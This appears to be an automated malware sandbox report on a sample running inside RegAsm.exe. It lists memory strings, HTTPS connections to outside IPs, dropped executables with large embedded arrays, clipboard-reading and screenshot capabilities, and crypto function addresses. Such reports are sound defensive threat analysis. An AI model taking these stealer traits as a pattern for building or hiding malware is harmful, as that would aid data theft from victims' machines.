Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000003.00000002.2602299616.0000000019E6C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/.exe
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/XtskAOKlzbDcHFgqacPdLggz.exe
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/e:
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: RegAsm.exe, 00000003.00000002.2602299616.0000000019E6C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/ows:
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49741 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00439D70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

10_2_00439D70

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00439D70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

10_2_00439D70

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 394240
Source: KECBKKEBKE.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 360448
Source: 66fa2b049020f_ldnf[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 360448
Source: EGDGCGCFHI.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 394240
Source: 66fa2afc5abea_vasd[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 394240
Source: DBGIJEHIID.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 314368

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C57B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C57B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C57B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C51F280

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C5BC	3_2_0041C5BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B85C	3_2_0041B85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DA83	3_2_0042DA83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D313	3_2_0042D313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419654	3_2_00419654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DE6B	3_2_0042DE6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CE7E	3_2_0042CE7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D6B1	3_2_0042D6B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5135A0	3_2_6C5135A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58545C	3_2_6C58545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C525440	3_2_6C525440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C555C10	3_2_6C555C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C562C10	3_2_6C562C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58AC00	3_2_6C58AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58542B	3_2_6C58542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53D4D0	3_2_6C53D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5264C0	3_2_6C5264C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C556CF0	3_2_6C556CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51D4E0	3_2_6C51D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C526C80	3_2_6C526C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5734A0	3_2_6C5734A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57C4A0	3_2_6C57C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53ED10	3_2_6C53ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C540512	3_2_6C540512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52FD00	3_2_6C52FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C550DD0	3_2_6C550DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5785F0	3_2_6C5785F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C539E50	3_2_6C539E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C553E50	3_2_6C553E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C534640	3_2_6C534640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C562E4E	3_2_6C562E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51C670	3_2_6C51C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C586E63	3_2_6C586E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C557E10	3_2_6C557E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C565600	3_2_6C565600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C579E30	3_2_6C579E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51BEF0	3_2_6C51BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52FEF0	3_2_6C52FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5876E3	3_2_6C5876E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C535E90	3_2_6C535E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57E680	3_2_6C57E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C574EA0	3_2_6C574EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C557710	3_2_6C557710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C529F00	3_2_6C529F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C546FF0	3_2_6C546FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51DFE0	3_2_6C51DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5677A0	3_2_6C5677A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C538850	3_2_6C538850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53D850	3_2_6C53D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55F070	3_2_6C55F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C527810	3_2_6C527810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55B820	3_2_6C55B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C564820	3_2_6C564820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5850C7	3_2_6C5850C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53C0E0	3_2_6C53C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5558E0	3_2_6C5558E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5460A0	3_2_6C5460A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53A940	3_2_6C53A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C56B970	3_2_6C56B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58B170	3_2_6C58B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52D960	3_2_6C52D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C555190	3_2_6C555190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C572990	3_2_6C572990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54D9B0	3_2_6C54D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51C9A0	3_2_6C51C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C559A60	3_2_6C559A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C558AC0	3_2_6C558AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C531AF0	3_2_6C531AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55E2F0	3_2_6C55E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58BA90	3_2_6C58BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52CAB0	3_2_6C52CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C582AB0	3_2_6C582AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5122A0	3_2_6C5122A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C544AA0	3_2_6C544AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C515340	3_2_6C515340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52C370	3_2_6C52C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55D320	3_2_6C55D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5853C8	3_2_6C5853C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51F380	3_2_6C51F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5CAC60	3_2_6C5CAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C69AC30	3_2_6C69AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C686C00	3_2_6C686C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5BECC0	3_2_6C5BECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C61ECD0	3_2_6C61ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C68ED70	3_2_6C68ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EAD50	3_2_6C6EAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C748D20	3_2_6C748D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040F242	10_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00410A14	10_2_00410A14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040FEA0	10_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00434060	10_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401000	10_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B010	10_2_0040B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042F038	10_2_0042F038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00440118	10_2_00440118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00409130	10_2_00409130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00434136	10_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0043F1E0	10_2_0043F1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004492C0	10_2_004492C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401297	10_2_00401297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00405320	10_2_00405320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040A3F0	10_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004073B0	10_2_004073B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449410	10_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B4B0	10_2_0040B4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449580	10_2_00449580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00411600	10_2_00411600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042D6F0	10_2_0042D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449690	10_2_00449690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00448740	10_2_00448740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00408750	10_2_00408750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00403710	10_2_00403710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004407E0	10_2_004407E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449780	10_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041E85A	10_2_0041E85A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042887B	10_2_0042887B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00430810	10_2_00430810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00439880	10_2_00439880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040A940	10_2_0040A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041E900	10_2_0041E900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449A40	10_2_00449A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00409AC4	10_2_00409AC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00444B60	10_2_00444B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042DB00	10_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00439B00	10_2_00439B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041FB39	10_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042DBD5	10_2_0042DBD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00448C40	10_2_00448C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00428D00	10_2_00428D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00428D1C	10_2_00428D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0044AD20	10_2_0044AD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00429DC9	10_2_00429DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00407DB0	10_2_00407DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00437E70	10_2_00437E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042CEC0	10_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00429EE0	10_2_00429EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00410E90	10_2_00410E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040BFC0	10_2_0040BFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22424CF0	14_2_22424CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2241EA80	14_2_2241EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2243BAB0	14_2_2243BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22429000	14_2_22429000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22447810	14_2_22447810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2241F160	14_2_2241F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2244CE10	14_2_2244CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_224266C0	14_2_224266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22456E80	14_2_22456E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22441C50	14_2_22441C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2243A560	14_2_2243A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2241D57C	14_2_2241D57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2257A2C0	14_2_2257A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2258DB30	14_2_2258DB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225933E0	14_2_225933E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2257F8D0	14_2_2257F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2259D100	14_2_2259D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225A3920	14_2_225A3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225961E0	14_2_225961E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225A16D0	14_2_225A16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22579430	14_2_22579430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22579CC0	14_2_22579CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2259FD50	14_2_2259FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225A5F40	14_2_225A5F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225C4FB2	14_2_225C4FB2
